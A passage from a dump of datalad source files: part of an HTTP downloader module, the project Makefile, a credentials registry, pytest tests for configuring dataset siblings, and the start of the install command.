len(chunk)\n if size is not None and total + chunk_len > size:\n # trim the download to match target size\n chunk = chunk[:size - total]\n chunk_len = len(chunk)\n total += chunk_len\n f.write(chunk)\n try:\n # TODO: pbar is not robust ATM against > 100% performance ;)\n if pbar:\n pbar.update(total)\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning(\"Failed to update progressbar: %s\", ce)\n # TEMP\n # see https://github.com/niltonvolpato/python-progressbar/pull/44\n ui.out.flush()\n if size is not None and total >= size: # pragma: no cover\n break # we have done as much as we were asked\n\n if return_content:\n out = f.getvalue()\n return out\n\n\n@auto_repr\nclass HTTPDownloader(BaseDownloader):\n \"\"\"A stateful downloader to maintain a session to the website\n \"\"\"\n\n @borrowkwargs(BaseDownloader)\n def __init__(self, headers=None, **kwargs):\n \"\"\"\n\n Parameters\n ----------\n headers: dict, optional\n Header fields to be provided to the session. 
Unless User-Agent provided, a custom\n one, available in `DEFAULT_USER_AGENT` constant of this module will be used.\n \"\"\"\n super(HTTPDownloader, self).__init__(**kwargs)\n self._session = None\n headers = headers.copy() if headers else {}\n if 'user-agent' not in map(str.lower, headers):\n headers['User-Agent'] = DEFAULT_USER_AGENT\n self._headers = headers\n\n def _establish_session(self, url, allow_old=True):\n \"\"\"\n\n Parameters\n ----------\n allow_old: bool, optional\n If a Downloader allows for persistent sessions by some means -- flag\n instructs whether to use previous session, or establish a new one\n\n Returns\n -------\n bool\n To state if old instance of a session/authentication was used\n \"\"\"\n if allow_old:\n if self._session:\n lgr.debug(\"http session: Reusing previous\")\n return True # we used old\n elif url in cookies_db:\n cookie_dict = cookies_db[url]\n lgr.debug(\"http session: Creating new with old cookies %s\", list(cookie_dict.keys()))\n self._session = requests.Session()\n # not sure what happens if cookie is expired (need check to that or exception will prolly get thrown)\n\n # TODO dict_to_cookiejar doesn't preserve all fields when reversed\n self._session.cookies = requests.utils.cookiejar_from_dict(cookie_dict)\n # TODO cookie could be expired w/ something like (but docs say it should be expired automatically):\n # http://docs.python-requests.org/en/latest/api/#requests.cookies.RequestsCookieJar.clear_expired_cookies\n # self._session.cookies.clear_expired_cookies()\n return True\n\n lgr.debug(\"http session: Creating brand new session\")\n self._session = requests.Session()\n self._session.headers.update(self._headers)\n if self.authenticator:\n self.authenticator.authenticate(url, self.credential, self._session)\n\n return False\n\n def get_downloader_session(self, url,\n allow_redirects=True,\n use_redirected_url=True,\n headers=None):\n # TODO: possibly make chunk size adaptive\n # TODO: make it not this ugly -- but at the moment we are testing end-file size\n # while can't know for sure if content was gunziped and whether it all went ok.\n # So safer option -- just request to not have it gzipped\n if headers is None:\n headers = {}\n if 'Accept-Encoding' not in headers:\n headers['Accept-Encoding'] = ''\n\n # TODO: our tests ATM aren't ready for retries, thus altogether disabled for now\n nretries = 1\n for retry in range(1, nretries+1):\n try:\n response = self._session.get(\n url, stream=True, allow_redirects=allow_redirects,\n headers=headers)\n #except (MaxRetryError, NewConnectionError) as exc:\n except Exception as exc:\n ce = CapturedException(exc)\n # happen to run into those with urls pointing to Amazon,\n # so let's rest and try again\n if retry >= nretries:\n #import epdb; epdb.serve()\n if not _FTP_SUPPORT and url.startswith(\"ftp://\"):\n msg_ftp = \"For ftp:// support, install requests_ftp. \"\n else:\n msg_ftp = \"\"\n\n raise AccessFailedError(\n \"Failed to establish a new session %d times. %s\"\n % (nretries, msg_ftp)) from exc\n lgr.warning(\n \"Caught exception %s. 
Will retry %d out of %d times\",\n ce, retry + 1, nretries)\n sleep(2**retry)\n\n check_response_status(response, session=self._session)\n headers = response.headers\n lgr.debug(\"Establishing session for url %s, response headers: %s\",\n url, headers)\n target_size = int(headers.get('Content-Length', '0').strip()) or None\n if use_redirected_url and response.url and response.url != url:\n lgr.debug(\"URL %s was redirected to %s and thus the later will be used\"\n % (url, response.url))\n url = response.url\n # Consult about filename. Since we already have headers,\n # should not result in an additional request\n url_filename = get_url_filename(url, headers=headers)\n\n headers['Url-Filename'] = url_filename\n return HTTPDownloaderSession(\n size=target_size,\n url=response.url,\n filename=url_filename,\n headers=headers,\n response=response\n )\n\n @classmethod\n def get_status_from_headers(cls, headers):\n \"\"\"Given HTTP headers, return 'status' record to assess later if link content was changed\n \"\"\"\n # used for quick checks for HTTP or S3?\n # TODO: So we will base all statuses on this set? e.g. for Last-Modified if to be\n # mapping from field to its type converter\n HTTP_HEADERS_TO_STATUS = {\n 'Content-Length': int,\n 'Content-Disposition': str,\n 'Last-Modified': rfc2822_to_epoch,\n 'Url-Filename': str,\n }\n # Allow for webserver to return them in other casing\n HTTP_HEADERS_TO_STATUS_lower = {s.lower(): (s, t) for s, t in HTTP_HEADERS_TO_STATUS.items()}\n status = {}\n if headers:\n for header_key in headers:\n try:\n k, t = HTTP_HEADERS_TO_STATUS_lower[header_key.lower()]\n except KeyError:\n continue\n status[k] = t(headers[header_key])\n\n # convert to FileStatus\n return FileStatus(\n size=status.get('Content-Length'),\n mtime=status.get('Last-Modified'),\n filename=get_response_disposition_filename(\n status.get('Content-Disposition')) or status.get('Url-Filename')\n )\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6804938316345215, "avg_line_length": 32.196720123291016, "blob_id": "06ac6847bbf45fb6a9bc68a1efe0aeebdec0df8d", "content_id": "a10e9e5483345bda53cf64f5cfe09b3d4177009a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 2025, "license_type": "permissive", "max_line_length": 150, "num_lines": 61, "path": "/Makefile", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# simple makefile to simplify repetitive build env management tasks under posix\n# Ideas borrowed from scikit-learn's and PyMVPA Makefiles -- thanks!\n\nPYTHON ?= python\n\nMODULE ?= datalad\n\nall: clean test\n\nclean:\n\t$(PYTHON) setup.py clean\n\trm -rf dist build bin\n\t-find . -name '*.pyc' -delete\n\t-find . -name '__pycache__' -type d -delete\n\nbin:\n\tmkdir -p $@\n\tPYTHONPATH=\"bin:$(PYTHONPATH)\" $(PYTHON) setup.py develop --install-dir $@\n\ntrailing-spaces:\n\tfind $(MODULE) -name \"*.py\" -exec perl -pi -e 's/[ \\t]*$$//' {} \\;\n\ncode-analysis:\n\tflake8 $(MODULE) | grep -v __init__ | grep -v external\n\tpylint -E -i y $(MODULE)/ # -d E1103,E0611,E1101\n\nlinkissues-changelog:\n\ttools/link_issues_CHANGELOG\n\nupdate-changelog: CHANGELOG.md\n\t@echo \".. This file is auto-converted from CHANGELOG.md (make update-changelog) -- do not edit\\n\\nChange log\\n**********\" > docs/source/changelog.rst\n\t# sphinx 3.4.3-2 on Debian incorrectly handles unicode character\n\t# and then fails claiming that underlines are too short. 
So we remove all\n\t# such problematic ones for now.\n\t# Also, for some reason auto sticks subsections all the way to 4th level of sectioning,\n\t# so we bring them back to 2nd.\n\t# And pandoc manages to just skip all the valid markdown urls for authors within (),\n\t# so doing manual post conversion\n\tcat \"$<\" | sed -e 's,^#### ,## ,g' \\\n\t| iconv -c -f utf-8 -t ascii \\\n | grep -v '^<.*> *$$' \\\n\t| pandoc -t rst \\\n\t| sed -e 's,\\[\\(@[^]]*\\)\\](\\([^)]*\\)),\\`\\1 <\\2>\\`__,g' \\\n\t>> docs/source/changelog.rst\n\n\nrelease-pypi: update-changelog\n\t# avoid upload of stale builds\n\ttest ! -e dist\n\t$(PYTHON) setup.py sdist\n\t# the wheels we would produce are broken on windows, because they\n\t# install an incompatible entrypoint script\n\t# https://github.com/datalad/datalad/issues/4315\n\t#$(PYTHON) setup.py bdist_wheel\n\ttwine upload dist/*\n\ndocs/source/basics_cmdline.rst.in: build/casts/cmdline_basic_usage.json\n\ttools/cast2rst $^ > $@\n\ndocs/source/basics_nesteddatasets.rst.in: build/casts/seamless_nested_repos.json\n\ttools/cast2rst $^ > $@\n" }, { "alpha_fraction": 0.5681818127632141, "alphanum_fraction": 0.5785984992980957, "avg_line_length": 28.33333396911621, "blob_id": "c4eac8787d1519ef5c00fc4340bca168489a8cec", "content_id": "a350edecbeeedbc6480d6c31c411444d43c7f76c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1056, "license_type": "permissive", "max_line_length": 87, "num_lines": 36, "path": "/datalad/downloaders/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Sub-module to provide access (as to download/query etc) to the remote sites\n\n\"\"\"\n\nfrom datalad.downloaders.credentials import (\n AWS_S3,\n LORIS_Token,\n NDA_S3,\n Token,\n UserPassword,\n GitCredential)\n\n__docformat__ = 'restructuredtext'\n\nfrom logging import getLogger\nlgr = getLogger('datalad.providers')\n\n# TODO: we might not need to instantiate it right here\n# lgr.debug(\"Initializing data providers credentials interface\")\n# providers = Providers().from_config_files()\nCREDENTIAL_TYPES = {\n 'user_password': UserPassword,\n 'aws-s3': AWS_S3,\n 'nda-s3': NDA_S3,\n 'token': Token,\n 'loris-token': LORIS_Token,\n 'git': GitCredential,\n}\n" }, { "alpha_fraction": 0.6050763726234436, "alphanum_fraction": 0.6107637882232666, "avg_line_length": 34.281925201416016, "blob_id": "f5a8b5a824b7f0c0128741bea40e828f512c04a7", "content_id": "fec54b84f927fa686d15fc8199a38a46432d29ee", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21275, "license_type": "permissive", "max_line_length": 86, "num_lines": 603, "path": "/datalad/distribution/tests/test_siblings.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### 
### ### ### ##\n\"\"\"Test adding sibling(s) to a dataset\n\n\"\"\"\n\nfrom datalad.api import (\n Dataset,\n clone,\n create,\n install,\n siblings,\n)\nfrom datalad.support.exceptions import InsufficientArgumentsError\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.path import basename\nfrom datalad.support.path import join as opj\nfrom datalad.support.path import (\n normpath,\n relpath,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n assert_false,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_result_count,\n assert_status,\n chpwd,\n create_tree,\n eq_,\n ok_,\n on_appveyor,\n serve_path_via_http,\n with_sameas_remote,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n on_windows,\n)\n\nimport pytest\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_siblings(origin=None, repo_path=None, local_clone_path=None):\n ca = dict(result_renderer='disabled')\n # a remote dataset with a subdataset underneath\n origds = Dataset(origin).create(**ca)\n _ = origds.create('subm 1', **ca)\n\n sshurl = \"ssh://push-remote.example.com\"\n httpurl1 = \"http://remote1.example.com/location\"\n httpurl2 = \"http://remote2.example.com/location\"\n\n # insufficient arguments\n # we need a dataset to work at\n with chpwd(repo_path): # not yet there\n assert_raises(InsufficientArgumentsError,\n siblings, 'add', url=httpurl1, **ca)\n\n # prepare src\n source = install(repo_path, source=origin, recursive=True, **ca)\n # pollute config\n depvar = 'remote.test-remote.datalad-publish-depends'\n source.config.add(depvar, 'stupid', scope='local')\n\n # cannot configure unknown remotes as dependencies\n res = siblings(\n 'configure',\n dataset=source,\n name=\"test-remote\",\n url=httpurl1,\n publish_depends=['r1', 'r2'],\n on_failure='ignore',\n **ca)\n assert_status('error', res)\n eq_(res[0]['message'],\n ('unknown sibling(s) specified as publication dependency: %s',\n set(('r1', 'r2'))))\n # prior config was not changed by failed call above\n eq_(source.config.get(depvar, None), 'stupid')\n\n res = siblings('configure',\n dataset=source, name=\"test-remote\",\n url=httpurl1,\n result_xfm='paths',\n **ca)\n\n eq_(res, [source.path])\n assert_in(\"test-remote\", source.repo.get_remotes())\n eq_(httpurl1,\n source.repo.get_remote_url(\"test-remote\"))\n\n # reconfiguring doesn't change anything\n siblings('configure', dataset=source, name=\"test-remote\",\n url=httpurl1, **ca)\n assert_in(\"test-remote\", source.repo.get_remotes())\n eq_(httpurl1,\n source.repo.get_remote_url(\"test-remote\"))\n # re-adding doesn't work\n res = siblings('add', dataset=source, name=\"test-remote\",\n url=httpurl1, on_failure='ignore', **ca)\n assert_status('error', res)\n # only after removal\n res = siblings('remove', dataset=source, name=\"test-remote\", **ca)\n assert_status('ok', res)\n assert_not_in(\"test-remote\", source.repo.get_remotes())\n # remove again (with result renderer to smoke-test a renderer\n # special case for this too)\n res = siblings('remove', dataset=source, name=\"test-remote\", **ca)\n assert_status('notneeded', res)\n\n res = siblings('add', dataset=source, name=\"test-remote\",\n url=httpurl1, on_failure='ignore', **ca)\n assert_status('ok', res)\n\n # add another remove with a publication dependency\n # again pre-pollute config\n depvar = 'remote.test-remote2.datalad-publish-depends'\n pushvar = 'remote.test-remote2.push'\n source.config.add(depvar, 'stupid', scope='local')\n 
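# stale values; the configure call below is expected to replace both settings\n    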
source.config.add(pushvar, 'senseless', scope='local')\n res = siblings('configure', dataset=source, name=\"test-remote2\",\n url=httpurl2, on_failure='ignore',\n publish_depends='test-remote',\n # just for smoke testing\n publish_by_default=DEFAULT_BRANCH,\n **ca)\n assert_status('ok', res)\n # config replaced with new setup\n #source.config.reload(force=True)\n eq_(source.config.get(depvar, None), 'test-remote')\n eq_(source.config.get(pushvar, None), DEFAULT_BRANCH)\n\n # add to another remote automagically taking it from the url\n # and being in the dataset directory\n with chpwd(source.path):\n res = siblings('add', url=httpurl2, **ca)\n assert_result_count(\n res, 1,\n name=\"remote2.example.com\", type='sibling')\n assert_in(\"remote2.example.com\", source.repo.get_remotes())\n\n # don't fail with conflicting url, when using force:\n res = siblings('configure',\n dataset=source, name=\"test-remote\",\n url=httpurl1 + \"/elsewhere\",\n **ca)\n assert_status('ok', res)\n eq_(httpurl1 + \"/elsewhere\",\n source.repo.get_remote_url(\"test-remote\"))\n\n # no longer a use case, I would need additional convincing that\n # this is anyhow useful other then triple checking other peoples\n # errors. for an actual check use 'query'\n # maybe it could be turned into a set of warnings when `configure`\n # alters an existing setting, but then why call configure, if you\n # want to keep the old values\n #with assert_raises(RuntimeError) as cm:\n # add_sibling(dataset=source, name=\"test-remote\",\n # url=httpurl1 + \"/elsewhere\")\n #assert_in(\"\"\"'test-remote' already exists with conflicting settings\"\"\",\n # str(cm.value))\n ## add a push url without force fails, since in a way the fetch url is the\n ## configured push url, too, in that case:\n #with assert_raises(RuntimeError) as cm:\n # add_sibling(dataset=source, name=\"test-remote\",\n # url=httpurl1 + \"/elsewhere\",\n # pushurl=sshurl, force=False)\n #assert_in(\"\"\"'test-remote' already exists with conflicting settings\"\"\",\n # str(cm.value))\n\n # add push url (force):\n res = siblings('configure',\n dataset=source, name=\"test-remote\",\n url=httpurl1 + \"/elsewhere\",\n pushurl=sshurl,\n **ca)\n assert_status('ok', res)\n eq_(httpurl1 + \"/elsewhere\",\n source.repo.get_remote_url(\"test-remote\"))\n eq_(sshurl,\n source.repo.get_remote_url(\"test-remote\", push=True))\n\n # recursively:\n for r in siblings(\n 'configure',\n dataset=source, name=\"test-remote\",\n url=httpurl1 + \"/%NAME\",\n pushurl=sshurl + \"/%NAME\",\n recursive=True,\n # we need to disable annex queries, as it will try to access\n # the fake URL configured above\n get_annex_info=False,\n **ca):\n repo = GitRepo(r['path'], create=False)\n assert_in(\"test-remote\", repo.get_remotes())\n url = repo.get_remote_url(\"test-remote\")\n pushurl = repo.get_remote_url(\"test-remote\", push=True)\n ok_(url.startswith(httpurl1 + '/' + basename(source.path)))\n ok_(url.endswith(basename(repo.path)))\n ok_(pushurl.startswith(sshurl + '/' + basename(source.path)))\n ok_(pushurl.endswith(basename(repo.path)))\n eq_(url, r['url'])\n eq_(pushurl, r['pushurl'])\n\n # recursively without template:\n for r in siblings(\n 'configure',\n dataset=source, name=\"test-remote-2\",\n url=httpurl1,\n pushurl=sshurl,\n recursive=True,\n # we need to disable annex queries, as it will try to access\n # the fake URL configured above\n get_annex_info=False,\n **ca):\n repo = GitRepo(r['path'], create=False)\n assert_in(\"test-remote-2\", repo.get_remotes())\n url = 
repo.get_remote_url(\"test-remote-2\")\n pushurl = repo.get_remote_url(\"test-remote-2\", push=True)\n ok_(url.startswith(httpurl1))\n ok_(pushurl.startswith(sshurl))\n # FIXME: next condition used to compare the *Repo objects instead of\n # there paths. Due to missing annex-init in\n # datalad/tests/utils.py:clone_url this might not be the same, since\n # `source` actually is an annex, but after flavor 'clone' in\n # `with_testrepos` and then `install` any trace of an annex might be\n # gone in v5 (branch 'master' only), while in direct mode it still is\n # considered an annex. `repo` is forced to be a `GitRepo`, so we might\n # compare two objects of different classes while they actually are\n # pointing to the same repository.\n # See github issue #1854\n if repo.path != source.repo.path:\n ok_(url.endswith('/' + basename(repo.path)))\n ok_(pushurl.endswith(basename(repo.path)))\n eq_(url, r['url'])\n eq_(pushurl, r['pushurl'])\n\n # recursively without template and pushurl but full \"hierarchy\"\n # to a local clone\n for r in siblings(\n 'configure',\n dataset=source,\n name=\"test-remote-3\",\n url=local_clone_path,\n recursive=True,\n # we need to disable annex queries, as it will try to access\n # the fake URL configured above\n get_annex_info=False,\n **ca):\n repo = GitRepo(r['path'], create=False)\n assert_in(\"test-remote-3\", repo.get_remotes())\n url = repo.get_remote_url(\"test-remote-3\")\n pushurl = repo.get_remote_url(\"test-remote-3\", push=True)\n\n eq_(normpath(url),\n normpath(opj(local_clone_path,\n relpath(str(r['path']), source.path))))\n # https://github.com/datalad/datalad/issues/3951\n ok_(not pushurl) # no pushurl should be defined\n # 5621: Users shouldn't pass identical names for remote & common data source\n assert_raises(ValueError, siblings, 'add', dataset=source, name='howdy',\n url=httpurl1, as_common_datasrc='howdy')\n\n\n@with_tempfile(mkdir=True)\ndef test_here(path=None):\n # few smoke tests regarding the 'here' sibling\n ds = create(path)\n res = ds.siblings(\n 'query',\n on_failure='ignore',\n result_renderer='disabled')\n assert_status('ok', res)\n assert_result_count(res, 1)\n assert_result_count(res, 1, name='here')\n here = res[0]\n eq_(ds.repo.uuid, here['annex-uuid'])\n assert_in('annex-description', here)\n assert_in('annex-bare', here)\n assert_in('available_local_disk_space', here)\n\n # unknown sibling query errors\n res = ds.siblings(\n 'query',\n name='notthere',\n on_failure='ignore',\n result_renderer='disabled')\n assert_status('error', res)\n\n # set a description\n res = ds.siblings(\n 'configure',\n name='here',\n description='very special',\n on_failure='ignore',\n result_renderer='disabled')\n assert_status('ok', res)\n assert_result_count(res, 1)\n assert_result_count(res, 1, name='here')\n here = res[0]\n eq_('very special', here['annex-description'])\n\n # does not die when here is dead\n res = ds.siblings('query', name='here', return_type='item-or-list')\n # gone when dead\n res.pop('annex-description', None)\n # volatile prop\n res.pop('available_local_disk_space', None)\n ds.repo.call_annex(['dead', 'here'])\n newres = ds.siblings('query', name='here', return_type='item-or-list')\n newres.pop('available_local_disk_space', None)\n eq_(res, newres)\n\n\n@with_tempfile(mkdir=True)\ndef test_no_annex(path=None):\n # few smoke tests regarding the 'here' sibling\n ds = create(path, annex=False)\n res = ds.siblings(\n 'configure',\n name='here',\n description='very special',\n on_failure='ignore',\n result_renderer='disabled')\n 
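# the sibling description is stored by git-annex, so this must be impossible for a plain-git dataset\n    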
assert_status('impossible', res)\n\n res = ds.siblings(\n 'enable',\n name='doesnotmatter',\n on_failure='ignore',\n result_renderer='disabled')\n assert_in_results(\n res, status='impossible',\n message='cannot enable sibling of non-annex dataset')\n\n\n@with_tempfile()\n@with_tempfile()\ndef test_arg_missing(path=None, path2=None):\n # test fix for gh-3553\n ds = create(path)\n assert_raises(\n InsufficientArgumentsError,\n ds.siblings,\n 'add',\n url=path2,\n )\n assert_status(\n 'ok',\n ds.siblings(\n 'add', url=path2, name='somename'))\n # trigger some name guessing functionality that will still not\n # being able to end up using a hostnames-spec despite being\n # given a URL\n if not on_windows:\n # the trick with the file:// URL creation only works on POSIX\n # the underlying tested code here is not about paths, though,\n # so it is good enough to run this on POSIX system to be\n # reasonably sure that things work\n assert_raises(\n InsufficientArgumentsError,\n ds.siblings,\n 'add',\n url=f'file://{path2}',\n )\n\n # there is no name guessing with 'configure'\n assert_in_results(\n ds.siblings('configure', url='http://somename', on_failure='ignore'),\n status='error',\n message='need sibling `name` for configuration')\n\n # needs a URL\n assert_raises(\n InsufficientArgumentsError, ds.siblings, 'add', name='somename')\n # just pushurl is OK\n assert_status('ok', ds.siblings('add', pushurl=path2, name='somename2'))\n\n # needs group with groupwanted\n assert_raises(\n InsufficientArgumentsError,\n ds.siblings, 'add', url=path2, name='somename',\n annex_groupwanted='whatever')\n\n\n@with_sameas_remote\n@with_tempfile(mkdir=True)\ndef test_sibling_enable_sameas(repo=None, clone_path=None):\n ds = Dataset(repo.path)\n create_tree(ds.path, {\"f0\": \"0\"})\n ds.save(path=\"f0\")\n ds.push([\"f0\"], to=\"r_dir\")\n ds.repo.drop([\"f0\"])\n\n ds_cloned = clone(ds.path, clone_path)\n\n assert_false(ds_cloned.repo.file_has_content(\"f0\"))\n # does not work without a name\n res = ds_cloned.siblings(\n action=\"enable\",\n result_renderer='disabled',\n on_failure='ignore',\n )\n assert_in_results(\n res, status='error', message='require `name` of sibling to enable')\n # does not work with the wrong name\n res = ds_cloned.siblings(\n action=\"enable\",\n name='wrong',\n result_renderer='disabled',\n on_failure='ignore',\n )\n assert_in_results(\n res, status='impossible',\n message=(\"cannot enable sibling '%s', not known\", 'wrong')\n )\n # works with the right name\n res = ds_cloned.siblings(action=\"enable\", name=\"r_rsync\")\n assert_status(\"ok\", res)\n ds_cloned.get(path=[\"f0\"])\n ok_(ds_cloned.repo.file_has_content(\"f0\"))\n\n\n@with_tempfile(mkdir=True)\ndef test_sibling_inherit(basedir=None):\n ds_source = Dataset(opj(basedir, \"source\")).create()\n\n # In superdataset, set up remote \"source\" that has git-annex group \"grp\".\n ds_super = Dataset(opj(basedir, \"super\")).create()\n ds_super.siblings(action=\"add\", name=\"source\", url=ds_source.path,\n annex_group=\"grp\", result_renderer='disabled')\n\n ds_clone = ds_super.clone(\n source=ds_source.path, path=\"clone\")\n # In a subdataset, adding a \"source\" sibling with inherit=True pulls in\n # that configuration.\n ds_clone.siblings(action=\"add\", name=\"source\", url=ds_source.path,\n inherit=True, result_renderer='disabled')\n res = ds_clone.siblings(action=\"query\", name=\"source\",\n result_renderer='disabled')\n eq_(res[0][\"annex-group\"], \"grp\")\n\n\n@with_tempfile(mkdir=True)\ndef 
test_sibling_inherit_no_super_remote(basedir=None):\n ds_source = Dataset(opj(basedir, \"source\")).create()\n ds_super = Dataset(opj(basedir, \"super\")).create()\n ds_clone = ds_super.clone(\n source=ds_source.path, path=\"clone\")\n # Adding a sibling with inherit=True doesn't crash when the superdataset\n # doesn't have a remote `name`.\n ds_clone.siblings(action=\"add\", name=\"donotexist\", inherit=True,\n url=ds_source.path, result_renderer='disabled')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_sibling_path_is_posix(basedir=None, otherpath=None):\n ds_source = Dataset(opj(basedir, \"source\")).create()\n # add remote with system native path\n ds_source.siblings(\n action=\"add\",\n name=\"donotexist\",\n url=otherpath,\n result_renderer='disabled')\n res = ds_source.siblings(\n action=\"query\",\n name=\"donotexist\",\n result_renderer='disabled',\n return_type='item-or-list')\n # path URL should come out POSIX as if `git clone` had configured it for origin\n # https://github.com/datalad/datalad/issues/3972\n eq_(res['url'], Path(otherpath).as_posix())\n\n\n@with_tempfile()\ndef test_bf3733(path=None):\n ds = create(path)\n # call siblings configure for an unknown sibling without a URL\n # doesn't work, but also doesn't crash\n assert_result_count(\n ds.siblings(\n 'configure',\n name='imaginary',\n publish_depends='doesntmatter',\n url=None,\n on_failure='ignore'),\n 1,\n status='error',\n action=\"configure-sibling\",\n name=\"imaginary\",\n path=ds.path,\n )\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@serve_path_via_http\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_as_common_datasource(testbed=None, viapath=None, viaurl=None,\n remotepath=None, url=None, remotepath2=None, url2=None):\n ds = Dataset(remotepath).create()\n (ds.pathobj / 'testfile').write_text('likemagic')\n (ds.pathobj / 'testfile2').write_text('likemagic2')\n ds.save()\n\n # make clonable via HTTP\n ds.repo.call_git(['update-server-info'])\n\n # populate location of the 2nd url, so we have two remotes with different UUIDs\n ds2 = clone(source=remotepath, path=remotepath2)\n ds2.get('testfile')\n ds2.repo.call_git(['update-server-info'])\n\n # this does not work for remotes that have path URLs\n ds_frompath = clone(source=remotepath, path=viapath)\n res = ds_frompath.siblings(\n 'configure',\n name=DEFAULT_REMOTE,\n as_common_datasrc='mike',\n on_failure='ignore',\n result_renderer='disabled',\n )\n assert_in_results(\n res,\n status='impossible',\n message='cannot configure as a common data source, URL protocol '\n 'is not http or https',\n )\n\n # but it works for HTTP\n ds_fromurl = clone(source=url, path=viaurl)\n res = ds_fromurl.siblings(\n 'configure',\n name=DEFAULT_REMOTE,\n as_common_datasrc='mike2',\n result_renderer='disabled',\n )\n assert_status('ok', res)\n\n # same thing should be possible by adding a fresh remote\n # We need to do it on a different URL since some versions of git-annex\n # such as 10.20220322-1~ndall+1 might refuse operate with multiple remotes\n # with identical URLs, and otherwise just reuse the same UUID/remote\n res = ds_fromurl.siblings(\n 'add',\n name='fresh',\n # we must amend the URL given by serve_path_via_http, because\n # we are serving the root of a non-bare repository, but git-annex\n # needs to talk to its .git (git-clone would also not eat\n # `url` unmodified).\n url=url2 + '.git',\n as_common_datasrc='fresh-sr',\n result_renderer='disabled',\n )\n 
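# adding a fresh sibling over http(s) as a common data source is expected to work\n    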
assert_status('ok', res)\n\n # now try if it works. we will clone the clone, and get a repo that does\n # not know its ultimate origin. still, we should be able to pull data\n # from it via the special remote\n testbed = clone(source=ds_fromurl, path=testbed)\n assert_status('ok', testbed.get('testfile'))\n eq_('likemagic', (testbed.pathobj / 'testfile').read_text())\n # and the other one\n assert_status('ok', testbed.get('testfile2'))\n\n # Let's get explicitly from both remotes which would not work if URL\n # above is wrong or one of the remotes not autoenabled\n for remote in 'mike2', 'fresh-sr':\n assert_status('ok', testbed.drop('testfile'))\n assert_status('ok', testbed.get('testfile', source=remote))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_specialremote(dspath=None, remotepath=None):\n ds = Dataset(dspath).create()\n ds.repo.call_annex(\n ['initremote', 'myremote', 'type=directory',\n f'directory={remotepath}', 'encryption=none'])\n res = ds.siblings('query', result_renderer='disabled')\n assert_in_results(\n res,\n **{'name': 'myremote',\n 'annex-type': 'directory',\n 'annex-directory': remotepath})\n" }, { "alpha_fraction": 0.5746340155601501, "alphanum_fraction": 0.5758093595504761, "avg_line_length": 42.6317024230957, "blob_id": "47b74c4ead81cc5b9a99f822344a0eee8aa9dce7", "content_id": "cf5ce37b7d30823309c98e97da16d0c54e5a7d2c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18718, "license_type": "permissive", "max_line_length": 91, "num_lines": 429, "path": "/datalad/distribution/install.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for dataset (component) installation\n\n\"\"\"\n\nimport logging\nfrom os import curdir\n\nfrom datalad.interface.base import Interface\nfrom datalad.interface.common_opts import (\n recursion_flag,\n recursion_limit,\n location_description,\n jobs_opt,\n reckless_opt,\n)\nfrom datalad.interface.results import (\n get_status_dict,\n YieldDatasets,\n is_result_matching_pathsource_argument,\n)\nfrom datalad.interface.base import (\n build_doc,\n eval_results,\n)\nfrom datalad.support.constraints import (\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n InsufficientArgumentsError,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.support.network import (\n RI,\n PathRI,\n)\nfrom datalad.utils import ensure_list\n\nfrom datalad.distribution.dataset import (\n datasetmethod,\n resolve_path,\n require_dataset,\n EnsureDataset,\n)\nfrom datalad.distribution.get import Get\nfrom datalad.core.distributed.clone import Clone\n\n__docformat__ = 'restructuredtext'\n\nlgr = logging.getLogger('datalad.distribution.install')\n\n\n@build_doc\nclass Install(Interface):\n \"\"\"Install one or many datasets from remote URL(s) or local PATH source(s).\n\n This command creates local :term:`sibling`\\(s) of existing dataset(s) from\n (remote) locations specified as URL(s) or path(s). 
